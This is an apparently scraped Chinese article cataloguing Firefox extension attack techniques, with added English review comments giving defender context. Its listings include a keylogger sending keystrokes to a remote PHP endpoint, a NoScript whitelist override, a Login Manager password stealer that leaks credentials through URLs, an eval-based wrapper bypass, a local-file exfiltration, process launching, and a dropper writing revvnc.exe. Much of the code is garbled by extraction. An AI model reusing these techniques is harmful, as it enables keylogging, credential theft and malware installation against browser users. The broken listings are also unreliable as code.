浏览器Firefox下攻击技巧总结漏洞预警 -电脑资料
一、Key Logger
// 先在Mozilla Firefox中用addEventListener为keypress事件注册一个事件处理程序,这里为onkey函数,以此实现键盘记录功能。
// NOTE(review): this listing is garbled by extraction (quotes appear as \" and
// several lines are cut off mid-statement), so it is not runnable as shown.
// What it illustrates: a document-wide keypress listener that accumulates typed
// characters and periodically sends them to a remote URL, i.e. a keylogger.
// Defender angle: script or extension code that registers global key handlers
// AND issues outbound requests carrying typed text is the pattern to hunt for;
// extension review/signing and egress monitoring are the practical mitigations.
document.addEventListener(\"keypress\
var keys='';
function onkey(e){
keyss += String.fromCharCode(e.charCode); // convert the key code to a character (the next statement, `if (keys.length>20){`, was folded into this comment by extraction)
// send the recorded characters to the remote site with an XMLHttpRequest (URL host stripped by extraction)
http=new XMLHttpRequest;
url = \"http:///prasannak/ler.php?keylog=\"+keyss+\"\\n\";
http.open(\"GET\
http.send(null);
keyss='';
}
}
二、No-Script Bypass
利用XPCOM(跨平台组件对象模型)中的类和组件将恶意站点添加到no-script白名单中,以此绕过no-script插件的保护。
// 其中let关键字只在Firefox或者其它基于mozilla的浏览器中有效,它代表着类似局部变量的意义,具体可参考这里:
// /en/New_in_JavaScript_1.7#let_statement
// NOTE(review): `let` here is the Firefox-only JavaScript 1.7 form mentioned in
// the comment above. The Components.classes contract ID below looks truncated
// by extraction (its leading part is missing) and the setCharPref line is cut
// off, so the listing is not runnable as shown.
// Defender angle: Components.classes is only reachable from chrome-privileged
// code (as I understand it, an installed extension, not a web page), so the
// risk is a malicious or compromised extension; NoScript users can audit the
// whitelist pref named here, and extension vetting is the real control.
let Sub_btn = {
onCommand: function(event) {
// obtain the preferences service via XPCOM
var perfs =
Components.classes[\"/preferences-service;1\"].
getService(Components.interfaces.nsIPrefService);
// select the "capability.policy.maonoscript." branch, where NoScript keeps its site policy
perfs = perfs.getBranch(\"capability.policy.maonoscript.\");
// overwrite the "sites" pref (NoScript's whitelist) to include the attacker's site — line truncated
perfs.setCharPref(\"sites\
}
}
三、Password Stealer
利用XPCOM来获取LoginManager中记录的登录信息,以截取用户的登录密码。
// NOTE(review): reads every credential stored in the Login Manager and leaks
// host, username and password through the URL of a window.open — a password
// stealer. It needs chrome-privileged XPCOM access (nsILoginManager), i.e. it
// runs as extension code. The contract ID and the window.open target host look
// truncated by extraction; the listing is not runnable as shown.
// Defender angle: a primary (master) password keeps stored logins encrypted
// until unlocked, and extension vetting/signing is the control against this
// class of abuse; a new window opened per stored login is also a visible IOC.
let HelloWorld = {
onCommand: function(event) {
// obtain the login-manager service via XPCOM
var l2m =
Components.classes[\"/login-manager;1\"].
getService(Components.interfaces.nsILoginManager);
// fetch every login record the manager has stored
alltheinfo = l2m.getAllLogins({});
for (i=0; I<=alltheinfo.length; i=i+1){
// leak hostname.username.password in the URL of a new window (host stripped by extraction)
window.open('/?'
+ unescape(alltheinfo[i].hostname) + '.'
+ unescape(alltheinfo[i].username) + '.'
+ unescape(alltheinfo[i].password));
}
}
} ;
四、攻击DOM与事件句柄
Extension XUL Code
Malicious Web Location Code
This Test Page
五、Bypassing Wrappers
Extension Code
// NOTE(review): `function Test_Function` has no parameter list in this copy
// (extraction or author error), and `my_message` / `my_message1` are not
// defined in the listing — presumably globals set by the malicious page
// referenced below; verify against the missing "Malicious Website Code".
// The point of this section: the XPCNativeWrapper normally shields chrome
// (extension) code from content-page tampering. Reading through
// `wrappedJSObject` discards that shield, and `eval` of the page-supplied
// string then runs attacker text with the extension's privileges. For any
// real extension the fix is never to eval content-supplied strings and never
// to read content objects through wrappedJSObject.
function Test_Function
{
// with the wrapper in place the page-defined global is not visible from chrome
test = my_message
if (test==null)
{
alert(\"Wrapper Exists\")
}
else{
alert(test);
// bypass the wrapper and read a second page-controlled value
trim =
window.content.wrappedJSObject.my_message1
// executes page-controlled text in the extension's context — the vulnerability
eval(trim);
}
}
Malicious Website Code
This Test Page
六、本地文件访问
// NOTE(review): the quotes in this copy are typographic (” “) and the target
// URL host is stripped, so the snippet is not runnable as shown.
// `document.ReadURL.readFile` is not a standard DOM API — presumably a helper
// exposed to content by a vulnerable extension; verify. What it illustrates: a
// web page reading a local file (file:///C:/boot.ini) through an extension-
// provided helper and then navigating to a remote URL that carries the file
// contents. Defender angle: the root cause is an extension exposing file
// access to untrusted content; such helpers should never be reachable from
// web pages.
var fileToRead=”file:///C:/boot.ini”;
// read the local file through the (non-standard) helper
var fileContents=document.ReadURL.readFile(fileToRead);
setTimeout(“”,100);
// leak the contents in the URL of a navigation (host stripped by extraction)
var remoteLocation=”/” + unescape(fileContents);
document.location=remoteLocation;
七、远程代码执行
// NOTE(review): launches /usr/bin/gnome-terminal via nsIProcess. Requires
// chrome-privileged XPCOM access, so this is extension-side code; the contract
// IDs look truncated by extraction. Defender angle: a browser process spawning
// a terminal or shell is a strong endpoint-detection signal, and extension
// vetting/signing is the preventive control.
var lFile = Components.classes[\"/file/local;1\"].
createInstance(Components.interfaces.nsILocalFile);
var lPath = \"/usr/bin/gnome-terminal\";
// point the nsILocalFile at the binary to execute
lFile.initWithPath(lPath);
var process = Components.classes[\"/process/util;1\"].
createInstance(Components.interfaces.nsIProcess);
process.init(lFile);
// run(false, ...) — presumably the non-blocking form with no arguments; verify against nsIProcess docs
process.run(false,'','');
八、写文件系统
// NOTE(review): downloader half of the "write to file system" example: fetches
// `url` with an XMLHttpRequest and hands the response to makefile(). The open()
// and setTimeout() lines are cut off by extraction, so it is not runnable as
// shown. Defender angle: an extension fetching an arbitrary URL and passing the
// raw bytes to a file-writing routine is the dropper pattern to look for.
var xmlhttp;
function loadXMLDoc(url){
xmlhttp=new XMLHttpRequest;
xmlhttp.open(\"GET\
// the x-user-defined charset keeps the response bytes unaltered, i.e. usable as binary data
xmlhttp.overrideMimeType('text/plain; charset=x-user-defined');
xmlhttp.send(null);
// on success, pass the body to makefile() (setTimeout line truncated)
if (xmlhttp.status==200){
setTimeout(\"\
makefile(xmlhttp.responseText);
}
}
// NOTE(review): writes `bdata` to a file named revvnc.exe under the user's
// Home directory using chrome-privileged XPCOM file APIs; contract IDs and the
// get("Home") line look truncated by extraction. Defender angle: the browser
// process creating an executable in the user's home directory is an obvious
// endpoint IOC, and extension signing/vetting is the preventive control.
function makefile(bdata){
// resolve the user's Home directory through the directory service
var getWorkingDir= Components.classes[\"/file/directory_service;1\"].
getService(Components.interfaces.nsIProperties).
get(\"Home\
var aFile = Components.classes[\"/file/local;1\"].
createInstance(Components.interfaces.nsILocalFile);
// target path: <Home>\revvnc.exe
aFile.initWithPath( getWorkingDir.path + \"\\\\revvnc.exe\" );
aFile.createUnique( Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 777);
var stream = Components.classes[\"/network/safe-file-output-stream;1\"].
createInstance(Components.interfaces.nsIFileOutputStream);
// open for writing with the given flag bits and mode
stream.init(aFile, 0x04 | 0x08 | 0x20, 0777, 0);
stream.write(bdata, bdata.length);
// finish the safe stream (commit) or close a plain stream
if (stream instanceof Components.interfaces.nsISafeOutputStream){
stream.finish;
} else{
stream.close;
}
}